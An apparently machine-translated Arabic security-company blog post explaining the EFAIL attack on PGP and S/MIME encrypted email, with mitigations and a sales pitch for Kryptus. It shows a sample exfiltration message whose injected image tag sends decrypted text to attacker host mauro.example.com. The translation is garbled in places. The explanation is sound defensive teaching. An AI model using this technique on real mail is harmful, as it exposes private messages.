بقلم: كونرادو جوفيا

ثغرة أمنية تسمى "البريد الإلكترونيكُشف عن ثغرة أمنية في 14 مايو 2018 من قِبل باحثين من جامعات أوروبية. تستغل هذه الثغرة بشكل رئيسي ثغرة في تطبيقات البريد الإلكتروني المشفرة (PGP وS/MIME). تسمح هذه الثغرة للمهاجم بقراءة الرسالة الأصلية من خلال الوصول إلى الرسالة المشفرة فقط، بينما يستخدم الضحية برنامجًا ضعيفًا.

في هذه التدوينة سوف نشرح بمزيد من التفصيل كيف تعمل هذه الثغرة الأمنية.

ما هو PGP و S/MIME؟

الرسائل والملفات المرسلة عبر البريد الإلكتروني ليست آمنة إذا تم إرسالها بالطريقة القياسية. في الماضي، كانت جميع رسائل البريد الإلكتروني تُرسل بشكل واضح، أي بدون أي آلية أمنية لحمايتها. تمكن أي مهاجم من قراءة رسائل البريد الإلكتروني وتعديلها أثناء نقلها.

مع مرور الوقت، أضافت مخططات مثل STARTTLS تشفيرًا إلى رسائل البريد الإلكتروني، ومع ذلك، فإن هذا التشفير يكون "من البداية إلى النهاية". لا تحمي هذه الطريقة لحماية البيانات أثناء النقل الرسائل الموجودة على خادم البريد الإلكتروني، أي أن مسؤول النظام الخبيث يمكنه قراءة رسائل البريد الإلكتروني من جميع الحسابات الموجودة على خادم البريد الإلكتروني الخاص بك.

لنفترض أن أليس ترسل بريدًا إلكترونيًا من حسابها على Gmail إلى بوب الذي لديه بريد إلكتروني على Yahoo:

  • يقوم عميل البريد الإلكتروني الخاص بـ Alice بتشفير الرسالة وإرسالها إلى خادم GMail.
  • يقوم GMail بفك تشفير الرسالة وحفظها على الخادم
  • يقوم GMail بإعادة تشفير الرسالة إلى Yahoo وإرسالها إلى Yahoo
  • يقوم ياهو بفك تشفير الرسالة وحفظها على الخادم
  • ياهو تتيح الرسالة لبيتو

من الواضح أن هناك العديد من نقاط الضعف في هذا المخطط: موظف غير أمين في Gmail أو Yahoo أو أحد المتسللين الذين اخترقهما قادر على قراءة الرسالة بوضوح.

ولهذا السبب، يتم استخدام التشفير من البداية إلى النهاية. وفيها، تقوم أليس بتشفير الرسالة مباشرة إلى بوب. كلاهما جيميل، ياهوأو أي وسيط آخر غير قادر على فك شفرة الرسالة.

OS/MIME هو بروتوكول بريد إلكتروني آمن يسمح بالتشفير من البداية إلى النهاية، ويُستخدم على نطاق واسع في البيئات المؤسسية. PGP هو معيار ملف مشفر يمكن استخدامه أيضًا في رسائل البريد الإلكتروني؛ التنفيذ الأكثر شهرة لـ PGP هو برنامج GPG مفتوح المصدر.

يتم عادةً دعم OS/MIME بشكل أصلي في العديد من عملاء البريد الإلكتروني، بينما يتم دعم PGP من خلال المكونات الإضافية مثل Enigmail (لـ Thunderbird)، وGPG4win (Outlook)، وGPGTools (Apple Mail).

الهجوم

يستغل الهجوم مجموعة من العيوب في عملاء البريد الإلكتروني (أو رسائل البريد الإلكتروني على الويب) وبرامج تشفير البريد الإلكتروني (معايير PGP أو S/MIME). هناك عدد لا يحصى من التركيبات الضعيفة. في بعض الحالات، لا يتطلب الهجوم أي تفاعل مع الضحية: كل ما عليه فعله هو فتح البريد الإلكتروني. وفي حالات أخرى، يحتاج الضحية إلى التفاعل مع البريد الإلكتروني، عن طريق النقر عليه، على سبيل المثال.

من بين البرامج الرئيسية المعرضة للخطر:

  • Outlook 2007 و2010 باستخدام S/MIME أو البرنامج الإضافي GPG4win
  • Thunderbird باستخدام S/MIME أو البرنامج الإضافي GPG4win
  • بريد Apple باستخدام مكون S/MIME أو GPGTools الإضافي
  • تطبيق البريد لنظام iOS باستخدام S/MIME
  • Gmail باستخدام S/MIME

وتوجد القائمة الكاملة في الصفحات الأخيرة من المقالة التي تصف الهجوم.

كيف يمكن التخفيف من حدة الهجوم؟

يمكن التخفيف من حدة الهجوم عن طريق تعطيل تحميل الصور والبرامج النصية الخارجية في عميل البريد الإلكتروني وإزالة أي استثناءات تمت إضافتها مسبقًا. في Thunderbird، يتم تعطيل هذه الميزة بشكل افتراضي، على عكس Apple Mail.

سيتم تحديث عملاء البريد الإلكتروني بإجراءات تخفيف إضافية؛ ولهذا السبب، من المهم للغاية إبقاءها محدثة.

هل يجب أن أتوقف عن استخدام PGP/GPG أو S/MIME؟

إن هذه العيوب وغيرها من العيوب السابقة، بالإضافة إلى صعوبة استخدام هذه الأدوات، تؤدي إلى التوصية بعدم الاستمرار في استخدام PGP/GPG أو S/MIME. تعتبر تطبيقات المراسلة الفورية مثل Signal وWhatsApp أسهل في الاستخدام وحلول أكثر أمانًا.

ومع ذلك، لا يزال من الممكن استخدام PGP/GPG وS/MIME إذا لزم الأمر، ولكن مع توخي الحذر والتكوين المناسب لعملاء البريد الإلكتروني. على وجه الخصوص، يوصى باستخدام PGP/GPG بدلاً من S/MIME، حيث لا يوفر الأخير أي آلية لمنع هجوم EFail، كما سيتم وصفه لاحقًا.

ماذا يحتاج المهاجم لتنفيذ الهجوم؟

يحتاج المهاجم إلى:

احصل على بريد إلكتروني مشفر. لاحظ أنه قد يستخدم بريدًا إلكترونيًا مشفرًا حصل عليه منذ فترة طويلة؛

تغيير البريد الإلكتروني المشفر بطريقة محددة، وفقًا للهجوم؛

إرسال البريد الإلكتروني المشفر إلى أحد المستلمين الأصليين للرسالة؛

يجب على المستلم فتح البريد الإلكتروني باستخدام عميل ضعيف. في بعض الحالات، قد يحتاج الضحية أيضًا إلى التفاعل مع البريد الإلكتروني، على سبيل المثال عن طريق النقر فوقه.

كيف يعمل الهجوم؟

هناك عيبان تم استغلالهما في الهجوم.

الاستخراج المباشر

في النموذج الأول، يقوم المهاجم بإنشاء رسالة جديدة تحتوي على الرسالة المشفرة التي سيتم مهاجمتها. يسمح معظم العملاء بمثل هذه المرونة: يتم فك تشفير الجزء المشفر وعرضه مع الأجزاء الواضحة.

من حيث المبدأ، لا يؤدي هذا وحده إلى إنشاء ثغرة أمنية، ولكن بعض العملاء ينضمون إلى الأجزاء المختلفة من الرسالة متجاوزين أي تحقق من صحة تنسيق HTML.

على سبيل المثال، تخيل أن أليس ترسل إلى بوب الرسالة المشفرة: "كلمة المرور الخاصة بي هي aH67ko%"، فلنمثل هذه الرسالة المشفرة على أنها "TZ9MnPcCmuYAJxkMeyk7".

يقوم المهاجم ماورو باعتراض هذا البريد الإلكتروني، ويقوم بتجميع البريد الإلكتروني التالي وإرساله إلى بيتو:

الجزء 1 (واضح): عزيزي بيتو، < img src=”http://mauro.example.com/ الجزء 2 (مشفر): TZ9MnPcCmuYAJxkMeyk7 الجزء 3 (واضح): “> هل تلقيت كلمة المرور الخاصة بي؟ أليس

يقوم عميل Beto المعرض للخطر بفك تشفير الجزء الثاني، وربطه بالجزأين الآخرين، وعرض البريد الإلكتروني التالي بتنسيق HTML:

عزيزي بيتو، < img src=”http://mauro.example.com/My password is aH67ko%” > هل تلقيت كلمة المرور الخاصة بي؟ أليس

يقوم بعض العملاء، مثل Apple Mail، تلقائيًا بتحميل الصورة المشار إليها في عنوان URL "http://mauro.example.com/My password is aH67ko%"، والذي يحتوي على كلمة المرور التي أرسلتها Alice. سيتمكن ماورو، الذي يتحكم في الخادم "mauro.example.com"، من الوصول إلى عنوان URL الذي تم الوصول إليه وسيتمكن بعد ذلك من قراءة رسالة أليس المشفرة.

يقوم عملاء آخرون، مثل Thunderbird، بحظر تحميل الصور الخارجية بشكل افتراضي. ومع ذلك، فإنه يعرض رسالة للمستخدم تشير إلى حدوث القفل ويسمح له بإضافة استثناء، أو حتى تعطيل القفل تمامًا.

هناك طرق أخرى أكثر تطوراً لاستخراج الأسرار والتي لا تتضمن العلامة.  من HTML. يمكن للمهاجم إضافة جدول أنماط إلى البريد الإلكتروني، والذي يعرض نموذجًا، عند النقر عليه، يرسل الجزء المشفر بالكامل من الرسالة إلى خادم المهاجم.

الاستخراج باستغلال قابلية التشكيل

من الناحية المثالية، عندما يتم تشفير رسالة، فيجب أيضًا حمايتها باستخدام رمز مصادقة الرسالة (MAC). بهذه الطريقة، إذا حدث أي تغيير في الرسالة المشفرة أثناء النقل، يمكن للمستلم اكتشاف ذلك ويمكنه تجاهل الرسالة دون فتحها.

ومع ذلك، عندما تم إنشاء كل من S/MIME وPGP/GPG، لم يستخدما عناوين MAC، حيث لم تكن أهميتهما معترف بها في ذلك الوقت.

يتيح هذا للمهاجم تعديل رسالة مشفرة بطريقة تسمح بإدراج بيانات جديدة أو تغيير البيانات الموجودة. بهذه الطريقة، يمكنه تنفيذ هجوم مماثل للهجوم السابق، عن طريق إدراج علامة ""في بداية الرسالة بحيث يتم تضمين بقية الرسالة في عنوان الصورة، ويتم تحميل الصورة بواسطة عميل ضعيف، مما يسمح للمهاجم بقراءة الرسالة الأصلية بالكامل.

أضاف PGP/GPG في النهاية آلية مشابهة لـ MACs، تسمى MDC (كود اكتشاف التعديل). ومع ذلك، بسبب الطريقة التي يتم بها تحديد MDC ضمن تنسيق PGP، يمكن للمهاجم ببساطة إزالة MDC أو تغيير نوع الرسالة للإشارة إلى أنها غير محمية بواسطة MDC. في هذه الحالات، تقوم العديد من البرامج ببساطة بإصدار تحذير يتم تجاهله في أغلب الأحيان بواسطة عملاء البريد الإلكتروني.

ما هي الدروس المستفادة؟

استغل EFail عددًا من العيوب:

بعض عملاء البريد الإلكتروني يسمحون للرسائل بأن تحتوي على أجزاء واضحة ومشفرة، مما يؤدي إلى دمجها بطريقة خطيرة؛

يقوم بعض عملاء البريد الإلكتروني بتحميل صور أو نصوص خارجية، مما يسمح للمهاجم باستخراج أجزاء من الرسالة المشفرة وإرسالها إلى خادم تحت سيطرته حتى يمكن قراءة الرسائل؛

لا يوفر تنسيق S/MIME آليات للكشف عن التغييرات في الرسائل المشفرة، مما يسمح للمهاجم بتعديله بطريقة تجعل الرسالة، عند فك تشفيرها، تتسرب إلى المهاجم، مستغلة العيوب السابقة في عملاء البريد الإلكتروني؛

يوفر تنسيق PGP/GPG مثل هذه الآلية، ولكن يمكن للمهاجم تجاوزها بسهولة بسبب العيوب في مواصفات هذه الآلية ومعالجتها.

ولهذا السبب فمن الضروري:

تحسين أمان عملاء البريد الإلكتروني من خلال تمكين طرق أكثر قوة لمنع تحميل الصور والبرامج النصية الخارجية؛

تقوية PGP/GPG بحيث لا يكون من الممكن تجاهل الإخفاقات في عمليات التحقق من مصادقة الرسائل؛

قم بتحديث تنسيقات S/MIME وPGP/GPG لاستخدام رموز مصادقة الرسائل، باتباع أفضل ممارسات التشفير الحديثة. لسوء الحظ، فإن هذه المهمة تتطلب الوقت والتنسيق بين العديد من مطوري البرامج.

لسوء الحظ، فإن العديد من معايير التشفير المستخدمة عالقة في الزمن، وتفشل في مواكبة التقدم في هذا المجال. من الجدير بالتأمل أنه حتى يومنا هذا لا يزال من الصعب جدًا إرسال بريد إلكتروني بسيط مشفر بشكل آمن.

من الصعب تحديد الخيار الأفضل لحل المشكلة: تحديث مثل هذه التنسيقات والمعاناة من مشاكل التوافق والبرامج القديمة؟ إنشاء تنسيق جديد ويجب عليك النضال من أجل اعتماده؟ التخلي عن استخدام البريد الإلكتروني للتواصل الآمن واستخدام آليات أخرى مثل تطبيقات المراسلة الفورية مثل Signal، واتس اب ou تیلیجرام?

كما ترون، لا يزال هناك الكثير من العمل الذي يتعين القيام به.

كيف يمكن لـ Kryptus مساعدتي؟

لضمان اتصال آمن بنسبة 100٪، كريبتوس يمكننا تقديم خدمات أمان وتشفير مخصصة لاتصالاتك الداخلية. ونحن نتمتع بخبرة واسعة في هذه الحلول، حيث قمنا بتطوير مشاريع لصالح الدولة.

بالإضافة إلى ذلك، يمكننا المساعدة في إيجاد الحلول من خلال الأمن الإلكتروني، الاستشارات في تحديد استراتيجية التشفير الخاصة بالمنظمة. لدينا القدرة على مساعدتك في استراتيجية التشفير الخاصة بك ومساعدتك في تحديد ما يحتاج إلى الحماية وكيفية حمايته، حيث أن المعلومات الحساسة التي تم تسريبها مؤخرًا غير مشفرة في الغالب.

قد يعجبك أيضًا:
ارتفعت قيمة طلبات الفدية من خلال برامج الفدية بنسبة 950% في عام 2019
ارتفعت قيمة طلبات الفدية من خلال برامج الفدية بنسبة 950% في عام 2019

بقلم: ديبورا مينيزيس أظهرت الدراسة أن قيمة طلبات الفدية زادت من 1.2 مليار دولار أمريكي إلى 1.5 مليار دولار أمريكي. اقرأ المزيد

هل شركتك آمنة؟ 5 علامات على الهجمات الإلكترونية
رسم توضيحي يظهر صورة ظلية مجرم إلكتروني مقنع، مع رفع يديه نحو قفل رقمي، محاطًا بأكواد ثنائية ورموز رقمية، مما يشير إلى علامات الهجمات الإلكترونية.

حدد علامات الهجمات الإلكترونية الآن وتجنب الاختراقات الكارثية. في اقرأ المزيد